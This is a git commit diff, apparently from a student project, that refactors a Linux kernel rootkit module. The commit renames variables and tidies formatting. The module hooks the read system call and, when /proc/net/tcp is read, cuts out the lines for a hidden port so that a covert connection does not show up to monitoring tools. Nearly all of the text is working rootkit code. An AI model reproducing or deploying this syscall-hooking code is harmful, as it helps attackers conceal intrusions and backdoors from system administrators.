Dude, das war richtig schlecht geschriebener Code

dev_vlr
Valentin Lechner 5 years ago
parent ed5b2fa92a
commit c897df31ec

@ -23,6 +23,11 @@
*******************************************************************************/
#include "h1d3p0r7.h"
/**** var **********************************************************************
*******************************************************************************/
sys_read_ptr sys_read_orig;
/*******************************************************************************/
/*** FUNCTION ****************************************************************
@ -32,8 +37,8 @@
* RETURNS:
*******************************************************************************/
asmlinkage long hacked_read(unsigned int fd, char __user *buf,
size_t count)
asmlinkage long sys_read_fake(unsigned int fd, char __user *buf,
size_t count)
{
long result, bp, diff_in_bytes;
char *kbuf, *start_line, *end_line, *port_num;
@ -43,47 +48,59 @@ asmlinkage long hacked_read(unsigned int fd, char __user *buf,
struct path file_path;
// run real read
result = (*orig_read)(fd,buf,count);
if (result <= 0)
result = (*sys_read_orig)(fd, buf, count);
if (result <= 0){
return result;
}
// get pathname
// CITATION [8] from report
current_files = current->files;
files_table = files_fdtable(current_files);
file_path = files_table->fd[fd]->f_path;
pathname = d_path(&file_path,pbuf,256*sizeof(char));
// if virtual file /proc/net/tcp
if (!strncmp(pathname,"/proc/",6) && !strcmp(pathname+10,"/net/tcp")) {
// copy from user to kernelspace;
if (!access_ok(VERIFY_READ,buf,result))
pathname = d_path(&file_path, pbuf, 256*sizeof(char));
if (!strncmp(pathname, "/proc/", 6) && !strcmp(pathname + 10, "/net/tcp")) {
if (!access_ok(VERIFY_READ, buf, result)){
return -1;
if ((kbuf = kmalloc(result,GFP_KERNEL)) == NULL)
}
if ((kbuf = kmalloc(result, GFP_KERNEL)) == NULL){
return -1;
if (copy_from_user(kbuf,buf,result))
}
if (copy_from_user(kbuf, buf, result)){
return -1;
}
// filter out hidden ports
start_line = strchr(kbuf,':') - 4; // skip first line
start_line = strchr(kbuf, ':') - 4;
diff_in_bytes = (start_line - kbuf) * sizeof(char);
for (bp = diff_in_bytes; bp < result; bp += diff_in_bytes) {
start_line = kbuf + bp;
port_num = strchr(strchr(start_line,':') + 1,':') + 1;
end_line = strchr(start_line,'\n');
port_num = strchr(strchr(start_line, ':') + 1, ':') + 1;
end_line = strchr(start_line, '\n');
diff_in_bytes = ((end_line - start_line) + 1) * sizeof(char);
if (!strncmp(port_num,HIDE_PORT,4)) { // if magic port
memmove(start_line,end_line + 1, // delete line in file
result - bp - diff_in_bytes);
if (!strncmp(port_num, DEFAULT_PORT_HEX, 4)) {
memmove(start_line, end_line + 1,
result - bp - diff_in_bytes);
result -= diff_in_bytes;
}
}
// copy from kernel to userspace
if (!access_ok(VERIFY_WRITE,buf,result))
if (!access_ok(VERIFY_WRITE, buf, result)){
return EINVAL;
if (copy_to_user(buf,kbuf,result))
}
if (copy_to_user(buf, kbuf, result)){
return EINVAL;
}
kfree(kbuf);
}
// return number of bytes read

Loading…
Cancel
Save